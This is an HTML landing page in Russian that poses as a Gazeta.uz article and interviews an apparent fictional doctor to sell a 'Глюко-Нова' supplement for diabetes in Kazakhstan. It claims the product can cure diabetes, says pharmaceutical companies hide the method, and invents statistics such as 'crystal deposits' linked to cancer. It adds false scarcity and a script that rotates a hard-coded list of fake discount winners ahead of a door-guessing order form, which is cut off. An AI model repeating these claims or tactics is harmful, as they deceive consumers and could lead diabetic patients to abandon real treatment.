<!DOCTYPE html>
<html lang="ru" dir="ltr">

<head>
    <meta charset="UTF-8" />
    <meta name="referrer" content="no-referrer">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Купить Глюко-Нова экономно. Цены, отзывы. Забронируйте Глюко-Нова прямо сейчас!</title>
    <link href="./images/favicon.svg" rel="icon" type="image/png">
    <link media="all" href="css/index.css" type="text/css" rel="stylesheet" />
    <link rel="stylesheet" href="css/bts.css">
    <link rel="stylesheet" href="css/header.css">
    <link rel="stylesheet" href="src/doors.css">
    <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
</head>

<body class="ev-date">
    <header class="nav">
        <div class="top-navbar">
            <div class="top-navbar-left">
                <a href="#order0" id="menu-left" data-activates="slide-out-left"><i class="fas fa-bars"></i></a>
            </div>
            <div class="site-title">
                <a href="#order0">
                    <img src="./images/gazeta_logo_white.svg" alt="" style="width: 120px;">
                </a>
            </div>
        </div>
        <div class="nav__container">
            <div class="nav__container-logo">
                <a href="#order0">
                    <img src="./images/gazeta_logo.svg" alt="Газета.uz" title="Газета.uz" width="120">
                </a>
            </div>
            <ul class="nav__container-items">
                <li class="f">
                    <a href="#order0">Колонки</a>
                </li>
                <li>
                    <a href="#order0">Политика</a>
                </li>
                <li>
                    <a href="#order0">Экономика</a>
                </li>
                <li>
                    <a href="#order0">Общество</a>
                </li>
                <li>
                    <a href="#order0">Культура</a>
                </li>
                <li>
                    <a href="#order0">Спорт</a>
                </li>
                <li>
                    <a href="#order0">Мир</a>
                </li>
            </ul>
            <div class="nav__container-right">
                <div class="nav__container-search">
                    <div class="nav__container-search-go"><i class="fas fa-search" aria-hidden="true"></i></div>
                </div>
                <div class="nav__container-lang">
                    <a href="#order0" class="en">
                        <span>EN</span>
                    </a>
                    <a href="#order0" class="ru current">
                        <span>РУ</span>
                    </a>
                    <a href="#order0" class="uz">
                        <span>ЎЗ</span>
                    </a>
                    <a href="#order0" class="oz">
                        <span>O‘Z</span>
                    </a>
                </div>
            </div>
        </div>
    </header>
    <div id="bodyWrapper">
        <div id="mainWrapper">
            <div id="wrapper" style="display: block">
                <div id="content">
                    <div id="title_block">
                        <div class="title_block_wrapper">
                            <div class="title_block_content">
                                <div class="title_block_img">
                                    <a href="#order0">
                                        <img alt="img" src="images/image5.jpg" class="title_img" />
                                    </a>
                                </div>
                                <div class="title_block_shadow"></div>
                                <div class="title_block_texts">
                                    <div class="title_block_bread">
                                        <span> Статьи •</span>
                                        <span> лучшие •</span>
                                        <span> интервью</span>
                                    </div>
                                    <div class="title_block_subcontent">
                                        <div class="title_block_lead">
                                            <h1 class="title_h1">
                                                Министерство здравоохранения прогнозирует, что более 200 000 человек в
                                                Казахстане находятся в группе риска из‑за сахарного диабета и его
                                                осложнений в 2025 году. Главные причины — поздняя диагностика и
                                                недостаточный контроль уровня глюкозы в крови.
                                            </h1>
                                            <div class="title_bq">
                                                Как можно избежать этого и продлить свою жизнь на 12-17 лет? Чтобы узнать,
                                                читайте текст до конца.
                                            </div>
                                            <div class="title_block_author">
                                                <div class="tauthor">
                                                    <a href="#order0">Асыл Каптагаева</a>
                                                </div>
                                                <div class="tdate start date-7"></div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="padWrap">
                        <div class="article__text js-mediator-article">
                            <div class="article_content" style="padding-top: 33px">
                                <figure class="Figure1" style="text-align: center">
                                    <img alt="img" src="./images/doc.png" style="max-width: 100%;">
                                    <figcaption class="Figure-caption">
                                        <strong>Доктор Айнур Тажина</strong>, выдающийся специалист в области
                                        здравоохранения в Казахстане
                                    </figcaption>
                                </figure>
                                <p>
                                    Доктор Айнур Тажина — выдающийся специалист в области здравоохранения в Казахстане,
                                    терапевт. Она известен тем, что лечит людей, не прописывая таблетки. При этом все её
                                    пациенты восстанавливаются. <b>Среди пациентов терапевта — знаменитые личности из
                                        Казахстана, а также пациенты из других стран Южной и Северной Америки (включая США,
                                        Бразилию, Аргентину, Перу и др.).</b>
                                </p>
                                <p>
                                    Терапевт Айнур Тажина редко дает интервью, предпочитая больше времени уделять лечению
                                    пациентов. Однако журналистка нашего канала оказалась удачливой: знаменитый врач
                                    согласился ответить на несколько вопросов для тех, кто не имеет возможности записаться
                                    на приём в клинику.
                                </p>
                                <p>
                                    Доктор Айнур Тажина
                                    <span class="yellow-bg">УВЕРЕН, ЧТО КАЖДЫЙ ЧЕЛОВЕК МОЖЕТ СТАБИЛИЗИРОВАТЬ УРОВЕНЬ САХАРА ДОМА И ЗАМЕТНО УЛУЧШИТЬ САМОЧУВСТВИЕ.</span>
                                    Правильный режим и поддержка поджелудочной железы помогают устранить скачки сахара и
                                    снизить риск осложнений у пожилых людей.
                                </p>
                                <div class="green-modul">
                                    <p>
                                        Врач рассказал, как контролировать уровень сахара и поддерживать поджелудочную
                                        железу. Кроме того, материал охватывает следующие темы:
                                    </p>
                                    <ul>
                                        <li>Дожить до 100 лет при стабильном уровне сахара — реально</li>
                                        <li>Почему инсулинорезистентность ведёт к диабету 2&nbsp;типа</li>
                                        <li>Скрытые и явные признаки развивающегося диабета</li>
                                        <li>Современные подходы к контролю диабета без инъекций инсулина</li>
                                    </ul>
                                </div>
                                <h3>Неконтролируемый диабет опасен для жизни</h3>
                                <p><b> Терапевт Айнур Тажина:</b></p>
                                <p>- Я дам вам несколько данных, которые, надеюсь, заставят вас задуматься.</p>
                                <p>
                                    Сахарный диабет и его осложнения — одна из ведущих причин преждевременной смерти.
                                    Ключевой фактор развития диабета&nbsp;2&nbsp;типа — инсулинорезистентность, то есть
                                    снижение чувствительности тканей к инсулину. Без контроля гипергликемия постепенно
                                    повреждает сосуды и внутренние органы.
                                </p>
                                <p>
                                    <span class="red-bg">Хронически повышенный сахар ускоряет износ сосудов и повышает риск инфаркта, инсульта, слепоты и почечной недостаточности.</span>
                                </p>
                                <p>
                                    Что такое инсулинорезистентность и чем она опасна? Проще говоря, организм хуже
                                    реагирует на собственный инсулин, из‑за чего глюкоза дольше остается в крови. Это и
                                    вызывает скачки сахара и повышенную нагрузку на поджелудочную железу.
                                </p>
                                <p>
                                    Со временем развиваются осложнения диабета: нарушается работа сосудов, снижается
                                    эластичность тканей, ухудшается зрение, появляются онемение и «мурашки» в конечностях.
                                    Без лечения риски быстро нарастают.
                                </p>
                                <p>
                                    <strong>Особенно уязвимы мелкие сосуды (капилляры), питающие сетчатку глаз, почки и
                                        нервы.</strong> Из‑за этого прогрессируют ретинопатия, нефропатия и нейропатия — частые
                                    осложнения сахарного диабета.
                                </p>
                                <p>
                                    Обычно говорят, что «здоровье ухудшается само по себе», но на деле корнем проблемы
                                    часто оказывается длительная инсулинорезистентность и высокий сахар.
                                </p>
                                <figure class="Figure" style="text-align: center">
                                    <img alt="img" src="images/content-2.jpg" />
                                    <figcaption class="Figure-caption">
                                        Инсулинорезистентность — ключевой фактор диабета&nbsp;2&nbsp;типа и его
                                        осложнений.
                                    </figcaption>
                                </figure>
                                <p>
                                    Лично всё зависит от состояния сосудов организма. Если сосуды забиты в ногах, это
                                    приведёт к варикозу, постоянным отёкам и вечному чувству тяжести в ногах. Если это
                                    происходит в печени, развивается гепатоз и цирроз; если в суставах, появляется артрит и
                                    артроз или боль в позвоночнике. Если сосуды забиты в глазах, человек начинает постепенно
                                    терять зрение.
                                </p>
                                <h3>
                                    <span class="red-bg">Диабет без контроля неизбежно прогрессирует. Поддерживайте стабильный сахар, чтобы продлить активную жизнь.</span>
                                </h3>
                                <p>
                                    Инсулинорезистентность ускоряет метаболическое старение. Без контроля сахарный диабет
                                    укорачивает жизнь человека и снижает её качество.
                                </p>
                                <p>
                                    <b> Вместо 100 лет люди часто не доживают и до 70!</b> Особенно те, кто страдает от
                                    диабетом в 40–50 лет. Кстати, это один из самых явных признаков нарушенного
                                    углеводного обмена.
                                </p>
                                <img alt="img" src="./images/image.png" style="max-width: 100%">
                                <h3>Что усугубляет течение диабета</h3>
                                <p><b> Терапевт Айнур Тажина:</b></p>
                                <p>На сахар и самочувствие влияют и другие факторы, которые важно учитывать каждый день.</p>
                                <p class="center"><b style="color: #af0000; font-size: 24px">Хроническое воспаление</b></p>
                                <p>
                                    Длительная гипергликемия поддерживает воспалительные процессы и усиливает окислительный
                                    стресс. Это ускоряет повреждение сосудов и повышает риск сердечно‑сосудистых
                                    осложнений.
                                </p>
                                <p>
                                    Чем старше человек, тем выше риск того, что тромб оторвётся. Поэтому пожилые люди часто
                                    страдают от инсультов или инфарктов.
                                </p>
                                <p class="center"><b style="color: #af0000; font-size: 24px">Лишний вес и низкая активность</b></p>
                                <p>
                                    Избыточная масса тела снижает чувствительность тканей к инсулину и затрудняет контроль
                                    сахара. Умеренная физическая активность и сбалансированное питание помогают улучшить
                                    ответ на инсулин.
                                </p>
                                <p>
                                    Почти у 98% людей, умерших от рака, были обнаружены высокие уровни кристаллических
                                    отложений в крови. Все мы знаем, что ртуть вредна. При большом накоплении кристаллов
                                    кальция сама кровь становится вредной.
                                </p>
                                <figure class="Figure" style="text-align: center">
                                    <img alt="img" src="images/content-3.jpg" />
                                    <figcaption class="Figure-caption">
                                        На фоне неконтролируемого сахара сосуды быстрее изнашиваются, что ускоряет развитие
                                        хронических заболеваний и ухудшает качество жизни.
                                    </figcaption>
                                </figure>
                                <h3>Оцените своё состояние: распространённые симптомы диабета</h3>
                                <p>Если у вас есть хотя бы 2 из следующих симптомов, следует как можно скорее заняться контролем уровня сахара:
                                </p>
                                <ul>
                                    <li>Постоянная жажда и сухость во рту</li>
                                    <li>Частое мочеиспускание, особенно ночью</li>
                                    <li>Снижение остроты зрения, «мушки» перед глазами</li>
                                    <li>Медленное заживление ран и порезов</li>
                                    <li>Онемение, покалывание в стопах и ладонях</li>
                                    <li>Резкая утомляемость, сонливость после еды</li>
                                    <li>Ночные судороги в икроножных мышцах</li>
                                    <li>Кожный зуд и частые инфекции</li>
                                    <li>Непреднамеренное снижение веса или, наоборот, набор массы</li>
                                    <li>Повышенный аппетит и тяга к сладкому</li>
                                    <li>Головокружения и головные боли</li>
                                    <li>Сухость кожи, ломкость волос и ногтей</li>
                                    <li>Раздражительность, нарушения сна</li>
                                </ul>
                                <p><b>Терапевт Айнур Тажина:</b></p>
                                <p>
                                    Если вы никогда целенаправленно не контролировали уровень сахара, после начала курса вы
                                    почувствуете улучшение уже в первые дни.
                                </p>
                                <h3>
                                    Вы говорите, что нормализация уровня сахара может продлить жизнь пожилым людям и стабилизировать
                                    уровень сахара в крови?
                                </h3>
                                <p><b>Терапевт Айнур Тажина:</b></p>
                                <p>
                                    - Я знаю это точно. В клинике мы сейчас уделяем особое внимание контролю сахара у всех
                                    пациентов старше 50 лет (а иногда и после 40). После курса поддержки поджелудочной и
                                    изменения образа жизни мы оцениваем динамику.
                                    <span class="yellow-bg">У 9 ИЗ 10 ЧЕЛОВЕК УРОВЕНЬ САХАРА СТАБИЛИЗИРУЕТСЯ И НЕ ТРЕБУЕТ ЭКСТРЕННЫХ МЕР</span>
                                    .
                                </p>
                                <p>
                                    <b>Другими словами, многим, кто ежедневно принимает таблетки для контроля сахара,
                                        поможет комплексный подход: питание, движение и адресная поддержка поджелудочной.
                                        Даже если диабет не уйдёт полностью, самочувствие значительно улучшится.</b>
                                </p>
                                <p style="border: 2px dashed red; padding: 10px">
                                    К сожалению, этот простой способ нормализовать уровень сахара в крови скрывается от
                                    врачей и фармацевтических компаний, которые зарабатывают на длительных и дорогих
                                    лечениях. Ведь чем дольше человек болен, тем больше он тратит на лекарства. Это выгодно
                                    для них. нормализация уровня сахара - это лёгкий, экономичный и быстрый способ помочь
                                    восстановиться.
                                </p>
                                <p></p>
                                <h3>Метод стабилизации сахара для пенсионеров при диабете</h3>
                                <p><b>Терапевт Айнур Тажина:</b></p>
                                <p>
                                    - На данный момент есть средство в Казахстане, которое эффективно помогает
                                    стабилизировать уровень сахара. Оно называется
                                    <a href="#order0">Глюко-Нова</a>
                                    . Этот препарат был создан в 2021 году Институтом эндокринологии и
                                    медицины. Лекарство содержит около 40 активных компонентов: экстракты растений, полезных
                                    для сосудов, витамины, микро- и макроэлементы.
                                </p>
                                <figure class="Figure" style="text-align: center">
                                    <img alt="img" src="images/product.png" loading="lazy" style="width: 100%;max-width: 350px">
                                </figure>
                                <p>
                                    Хотелось бы отметить, что продукт <strong>не содержит искусственных стимуляторов</strong>:
                                    только концентрированные экстракты с метаболической поддержкой, витамины и минералы,
                                    которые помогают чувствительности к инсулину и работе поджелудочной железы.
                                </p>
                                <p>
                                    Большинство пациентов всё ещё просят меня совета по контролю сахара. В последнее время я
                                    рекомендую именно этот продукт. Он показывает высокую эффективность.
                                </p>
                                <p style="border: 2px dashed green; padding: 10px">
                                    <b>Кстати, Япония удерживает рекорд по продолжительности жизни. Дожить до 100 лет для
                                        японцев — это нормально. Ранее упор делали на питание и активность, а сейчас
                                        добавляют современные средства метаболической поддержки. Мы видим результат такого
                                        подхода: контроль сахара стал приоритетом национальных программ здоровья, особенно
                                        после 40–50 лет.</b>
                                </p>
                                <h3>
                                    Сколько времени нужно принимать <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b>, чтобы стабилизировать уровень сахара?
                                </h3>
                                <img alt="img" src="./images/doc2.png" style="max-width: 100%;">
                                <p>
                                    В среднем курс применения препарата составляет от 2 до 4 недель. По его завершению,
                                    нужно оценить ваше состояние здоровья.
                                </p>
                                <p>
                                    Я перечислю, что <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b> может сделать для вашего организма в процессе нормализации уровня сахара, а также
                                    спустя несколько месяцев.
                                </p>
                                <p><b>Стабилизирует уровень сахара и поддерживает поджелудочную железу</b></p>
                                <p style="background-color: #eff0df; padding: 5px">
                                    Комплекс биоактивных компонентов <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b> помогает повысить чувствительность тканей к инсулину и поддержать выработку
                                    собственного инсулина. В результате снижается выраженность скачков сахара, улучшается
                                    заживление ран, уходят слабость и сонливость. Появляется больше энергии для повседневных
                                    дел.
                                </p>
                                <p><b>Поддержит внутренние органы и суставы</b></p>
                                <p style="background-color: #eff0df; padding: 5px">
                                    Когда сахар в норме, ткани лучше питаются, а воспаление снижается. Это положительно
                                    сказывается на работе органов и подвижности суставов.
                                </p>
                                <p><b>Помогает снижать лишний вес</b></p>
                                <p style="background-color: #eff0df; padding: 5px">
                                    Избыточный вес ухудшает течение диабета. На фоне стабилизации сахара и корректировки
                                    питания вес снижается естественно. В среднем за месяц люди теряют несколько килограммов.
                                </p>
                                <p><b>Поддержит зрение и память</b></p>
                                <p style="background-color: #eff0df; padding: 5px">
                                    Когда уровень сахара стабилен, улучшается питание сетчатки и состояние когнитивных
                                    функций. Люди отмечают ясность зрения и мыслей.
                                </p>
                                <p><b>Поддержит мужское здоровье</b></p>
                                <p style="background-color: #eff0df; padding: 5px">
                                    Контроль сахара и улучшение микроциркуляции положительно влияют на эректильную функцию
                                    и качество жизни.
                                </p>
                                <h3>
                                    Недостаток <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b> в аптеках Казахстана!
                                </h3>
                                <h3>
                                    Насколько нам известно, купить <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b> в аптеках крайне сложно. Это средство редко бывает в наличии. Это правда? И что вы
                                    могли бы посоветовать гражданам Казахстана?
                                </h3>
                                <img alt="img" src="./images/product.png" style="width: 100%;max-width: 350px">
                                <p>
                                    - Да, это правда. <b>
                                        <a href="#order0">Глюко-Нова</a>
                                    </b> производится малыми и ограниченными партиями, поэтому оно не поступает в аптеки.
                                    Большая часть, к сожалению, уходит за рубеж, а другая часть покупается частными
                                    клиниками.
                                </p>
                                <p>
                                    К сожалению, у нас нет этого продукта в достаточном количестве для всех пациентов с
                                    диабетом в Казахстане. Поэтому мы решили предложить его тем, кто сделает заказ быстрее
                                    всего на нашем сайте.
                                </p>
                                <p>
                                    <strong>Если вы хотите вылечить диабет с помощью этого уникального продукта,
                                        рекомендую заказать его как можно скорее, пока он ещё в наличии.</strong>
                                </p>
                                <p>
                                    <b>Условия получения <b>
                                            <a href="#order0">Глюко-Нова</a>
                                        </b>:</b>
                                </p>
                                <ul>
                                    <li>
                                        Вы должны находиться в Казахстане. Мы не отправляем <b>
                                            <a href="#order0">Глюко-Нова</a>
                                        </b> за пределы страны.
                                    </li>
                                    <li>
                                        Покупка <b>
                                            <a href="#order0">Глюко-Нова</a>
                                        </b> разрешена
                                        <span class="yellow-bg">ТОЛЬКО ДЛЯ ЛИЧНОГО ИСПОЛЬЗОВАНИЯ</span>
                                        . Прошу перепродавцов оставить препарат для людей! Получать прибыль за счёт пожилых
                                        людей — это нечеловечно!
                                    </li>
                                    <li>
                                        Вы можете заказать получение этого продукта на сайте, заполнив специальную форму
                                        ниже. В ней необходимо указать номер телефона, чтобы мы могли связаться с нашим
                                        медицинским консультантом.
                                    </li>
                                </ul>
                                <h3>Воспользуйтесь этой возможностью, пока другие не сделали этого!</h3>
                                <p>
                                    Если вы хотите стабилизировать уровень сахара и снизить риски осложнений, закажите
                                    препарат как можно скорее, пока он ещё в наличии.
                                </p>
                                <div class="ctContent">
                                    <style type="text/css">
                                    @media only screen and (max-width: 500px) {
                                        .vik-winners-bl .lb_top {
                                            padding: 10px 10px 10px 30px;
                                        }

                                        .vik-winners-bl .lb_top:before {
                                            top: 5px;
                                            left: 5px;
                                            width: 20px;
                                            height: 25px;
                                            background-size: 100%;
                                        }

                                        .vik-winners-bl .lbt_text_1 {
                                            font-size: 18px;
                                            line-height: 20px;
                                        }

                                        .vik-winners-bl .lbt_text_2 {
                                            margin-top: 5px;
                                        }

                                        .vik-winners-bl .lb_text {
                                            font-size: 26px;
                                            line-height: 27px;
                                            margin-top: 20px;
                                        }

                                        .vik-winners-bl .lb_text>span {
                                            font-size: 40px;
                                            line-height: 41px;
                                        }
                                    }

                                    .vik-winners-bl .left_block {
                                        display: block;
                                        max-width: 100%;
                                        width: auto;
                                        margin: 0 auto;
                                        padding: 50px;
                                        background: #f9f9f9;
                                        font-family: sans-serif;
                                    }

                                    .vik-winners-bl .lb_top,
                                    .vik-winners-bl .wins {
                                        background: #fff;
                                    }

                                    .vik-winners-bl .lb_top {
                                        border: 1px solid #b5b5b5;
                                        border-radius: 15px;
                                        padding: 20px;
                                        position: relative;
                                    }

                                    .vik-winners-bl .lb_top:before {
                                        display: block;
                                        content: "";
                                        width: 40px;
                                        height: 50px;
                                        position: absolute;
                                        top: 25px;
                                        left: 25px;
                                    }

                                    .vik-winners-bl .lbt_text_1 {
                                        font-size: 20px;
                                        line-height: 30px;
                                        color: #272727;
                                        text-align: center;
                                    }

                                    .vik-winners-bl .lbt_text_2 {
                                        font-size: 13px;
                                        line-height: 15px;
                                        color: #626262;
                                        margin-top: 10px;
                                        text-align: center;
                                    }

                                    .vik-winners-bl .lb_text {
                                        text-transform: uppercase;
                                        font-size: 40px;
                                        line-height: 44px;
                                        text-transform: uppercase;
                                        margin: 50px 0 15px;
                                        text-align: center;
                                    }

                                    .vik-winners-bl .lb_text>span {
                                        display: inline-block;
                                        font-size: 30px;
                                        line-height: 76px;
                                    }

                                    .vik-winners-bl .wins {
                                        border: 1px solid #d8d8d8;
                                        border-radius: 15px;
                                    }

                                    .vik-winners-bl .win_line {
                                        display: table;
                                        width: 100%;
                                        height: 40px;
                                        border-bottom: 1px solid #d8d8d8;
                                    }

                                    .vik-winners-bl .win_line>div {
                                        display: table-cell;
                                        vertical-align: middle;
                                        width: 50%;
                                        padding: 0 5px 0 15px;
                                        font-size: 17px;
                                        line-height: 19px;
                                    }

                                    .vik-winners-bl .win_line:first-child {
                                        background: linear-gradient(89.47deg, #ed7b22 0, #f59a14 100%);
                                    }

                                    .vik-winners-bl .win_line:last-child {
                                        border-bottom: none;
                                    }

                                    @media only screen and (max-width: 1100px) {
                                        .vik-winners-bl .left_block {
                                            display: block;
                                        }
                                    }

                                    @media only screen and (max-width: 1000px) {
                                        .vik-winners-bl .left_block {
                                            padding: 30px 10px;
                                            max-width: 435px;
                                        }
                                    }

                                    @media only screen and (max-width: 880px) {
                                        .vik-winners-bl .left_block {
                                            max-width: 100%;
                                            float: none;
                                        }

                                        .vik-winners-bl .lb_text {
                                            text-align: center;
                                        }
                                    }

                                    @media (max-width: 720px) {
                                        .vik-winners-bl .win_line:first-child {
                                            display: none;
                                        }

                                        .vik-winners-bl .win_line {
                                            display: flex;
                                            align-items: center;
                                            flex-direction: column;
                                            justify-content: center;
                                            text-align: center;
                                        }

                                        .vik-winners-bl .win_line>div {
                                            width: 100% !important;
                                        }
                                    }

                                    @media only screen and (max-width: 500px) {
                                        .vik-winners-bl .lb_top {
                                            padding: 10px 10px 10px 30px !important;
                                        }

                                        .vik-winners-bl .lb_top:before {
                                            top: 5px;
                                            left: 5px;
                                            width: 20px;
                                            height: 25px;
                                            background-size: 100%;
                                        }

                                        .vik-winners-bl .lbt_text_1 {
                                            font-size: 18px;
                                            line-height: 20px;
                                        }

                                        .vik-winners-bl .lbt_text_2 {
                                            margin-top: 5px;
                                        }

                                        .vik-winners-bl .lb_text {
                                            font-size: 26px;
                                            line-height: 27px;
                                            margin-top: 20px;
                                        }

                                        .vik-winners-bl .lb_text>span {
                                            font-size: 40px;
                                            line-height: 41px;
                                        }
                                    }

                                    @media only screen and (max-width: 450px) {
                                        .vik-winners-bl .win_line>div {
                                            padding: 0 5px 0 10px;
                                            font-size: 15px;
                                            line-height: 19px;
                                        }
                                    }

                                    @media (max-width: 460px) {
                                        .vik-winners-bl .left_block {
                                            padding: 0 !important;
                                        }

                                        .vik-winners-bl .win_line>div {
                                            font-size: 14px !important;
                                        }

                                        .vik-winners-bl .lb_text>span {
                                            font-size: 20px;
                                        }

                                        .vik-winners-bl .lb_top {
                                            padding: 10px;
                                        }
                                    }
                                    </style>
                                    <div class="vik-winners-bl">
                                        <div class="left_block">
                                            <div class="lb_top">
                                                <div class="lbt_text_1 lt37">
                                                    Испытай удачу! Участвуй в розыгрыше (ниже на странице)! <br> Попробуй
                                                    получить
                                                    <a class="commentBox--578133" href="#order0" draggable="false">
                                                        Глюко-Нова
                                                    </a>
                                                    со скидкой!
                                                </div>
                                                <div class="lbt_text_2 lt38">
                                                    Кампания будет длиться с
                                                    <span class="fullDate date-1">08.10.2023</span>
                                                    до
                                                    <span class="fullDate date-0">08.10.2023</span>
                                                    включительно.
                                                </div>
                                            </div>
                                            <div class="lb_text lt39">
                                                ОНИ УЖЕ ПОЛУЧИЛИ СКИДКУ, <br> ЗНАЧИТ, ВЫ ТОЖЕ МОЖЕТЕ!
                                            </div>
                                            <div class="wins">
                                                <div class="win_line">
                                                    <div class="lt40">Имя</div>
                                                    <div class="lt41">Скидка</div>
                                                </div>
                                                <div class="win_line wincomment">
                                                    <div class="lt42">Исмоилбек Т.</div>
                                                    <div class="lt43">Получил 100% скидку</div>
                                                </div>
                                                <div class="win_line wincomment">
                                                    <div class="lt42">Нодира Ш.</div>
                                                    <div class="lt43">Получила 25% скидку</div>
                                                </div>
                                                <div class="win_line wincomment">
                                                    <div class="lt42">Азизбек Ю.</div>
                                                    <div class="lt43">Получил 10% скидку</div>
                                                </div>
                                                <div class="win_line wincomment">
                                                    <div class="lt42">Зарифа А.</div>
                                                    <div class="lt43">Получила 100% скидку</div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <script>
                                        $(document).ready(function () {
                                        var discounts = [];

                                        function randomIntFromInterval(min, max) {
                                            // min and max included
                                            return Math.floor(Math.random() * (max - min + 1) + min);
                                        }

                                        function fnShowNextWinner(i) {
                                            var rndInt = randomIntFromInterval(7, 15);
                                            setTimeout(function () {
                                                $(".wins .wincomment").first().remove();
                                                $(".wins").append(
                                                    '<div class="win_line wincomment"><div class="lt48">' +
                                                    discounts[i].name +
                                                    '</div><div class="lt49">' +
                                                    discounts[i].text +
                                                    "</div></div>"
                                                );
                                                if (i + 1 <= discounts.length) {
                                                    fnShowNextWinner(i + 1);
                                                }
                                            }, rndInt * 1000);
                                        }

                                        discounts[5] = {
                                            name: "Шохрух М.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[6] = {
                                            name: "Каримжон Р.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[7] = {
                                            name: "Зарина П.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[8] = {
                                            name: "Хуршид Р.",
                                            text: "Получил 100% скидку",
                                        };

                                        discounts[9] = {
                                            name: "Роберт К.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[10] = {
                                            name: "Татьяна Б.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[11] = {
                                            name: "Малика Л.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[12] = {
                                            name: "Анвар Д.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[13] = {
                                            name: "Сандра Г.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[14] = {
                                            name: "Патимат А.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[15] = {
                                            name: "Бахтиёр П.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[16] = {
                                            name: "Мелина А.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[17] = {
                                            name: "Диана Г.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[18] = {
                                            name: "Кассандра В.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[19] = {
                                            name: "Жанна П.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[20] = {
                                            name: "Дамир М.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[21] = {
                                            name: "Эстефания К.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[22] = {
                                            name: "Каролина И.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[23] = {
                                            name: "Сергей К.",
                                            text: "Получил 100% скидку",
                                        };

                                        discounts[24] = {
                                            name: "Роберт Г.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[25] = {
                                            name: "Наталья Л.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[26] = {
                                            name: "Дина Г.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[27] = {
                                            name: "Моника П.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[28] = {
                                            name: "Эдуардо Д.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[29] = {
                                            name: "Рикардо Г.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[30] = {
                                            name: "Сергей А.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[31] = {
                                            name: "Ампаро Г.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[32] = {
                                            name: "Эмиль Л.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[33] = {
                                            name: "Роджер Л.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[34] = {
                                            name: "Рауль М.",
                                            text: "Получил 100% скидку",
                                        };

                                        discounts[35] = {
                                            name: "Гулливер П.",
                                            text: "Получил 100% скидку",
                                        };

                                        discounts[36] = {
                                            name: "Ана П.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[37] = {
                                            name: "Антония Г.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[38] = {
                                            name: "Дора Д.",
                                            text: "Получила 100% скидку",
                                        };

                                        discounts[39] = {
                                            name: "Моиз П.",
                                            text: "Получил 25% скидку",
                                        };

                                        discounts[40] = {
                                            name: "Виола Я.",
                                            text: "Получила 10% скидку",
                                        };

                                        discounts[41] = {
                                            name: "Рауль С.",
                                            text: "Получил 100% скидку",
                                        };

                                        discounts[42] = {
                                            name: "Маркос А.",
                                            text: "Получил 10% скидку",
                                        };

                                        discounts[43] = {
                                            name: "Ана С.",
                                            text: "Получила 25% скидку",
                                        };

                                        discounts[44] = {
                                            name: "Гулливер А.",
                                            text: "Получил 100% скидку",
                                        };

                                        fnShowNextWinner(5);
                                    });
                                </script>
                                </div>
                                <br id="order0" />
                                <div class="middle" id="toform">
                                    <div id="form-block">
                                        <h3 class="door__head">
                                            Примите участие в акции и получите скидку на вашу покупку Глюко-Нова до 100%.
                                        </h3>
                                        <div class="door__wrapper">
                                            <h2 class="door__title">
                                                УГАДАЙТЕ ДВЕРЬ, ЗА КОТОРОЙ СКИДКА 100%
                                            </h2>
                                            <div class="door__container">
                                                <div class="door_box">
                                                    <div class="hi">
                                                        <p id="door__sales2" class="door__sales "></p>
                                                    </div>
                                                    <div id="door__2" class="door"></div>
                                                </div>
                                                <div class="door_box">
                                                    <div class="hi">
                                                        <p id="door__sales1" class="door__sales "></p>
                                                    </div>
                                                    <div id="door__1" class="door"></div>
                                                </div>
                                                <div class="door_box">
                                                    <div class="hi">
                                                        <p id="door__sales3" class="door__sales "></p>
                                                    </div>
                                                    <div id="door__3" class="door"></div>
                                                </div>
                                            </div>
                                        </div>
                                        <div id="order" style="display: none;">
                                            <div class="order">
                                                <div class="order__product">
                                                    <img class="product-img" src="./images/product.png" alt="img">
                                                </div>
                                                <div class="order__form">
                                                    <div class="tcenter">
                                                        Начало акции
                                                        <span class="date-1">16.05.2024</span>
                                                    </div>
                                                    <div class="tcenter">
                                                        Конец акции
                                                        <span class="date-0">17.05.2024</span>
                                                    </div>
                                                    <div class="price">
                                                        <!--<div class="price__item price__item--old">
                                                        <div class="price__item-title">
                                                            Старая цена:
                                                        </div>
                                                        <div class="price__item-value price__item-value--old">
                                                            <span class="x_price_previous">78</span>
                                                            <span class="x_currency">€</span>
                                                        </div>
                                                    </div>-->
                                                        <div class="price__item">
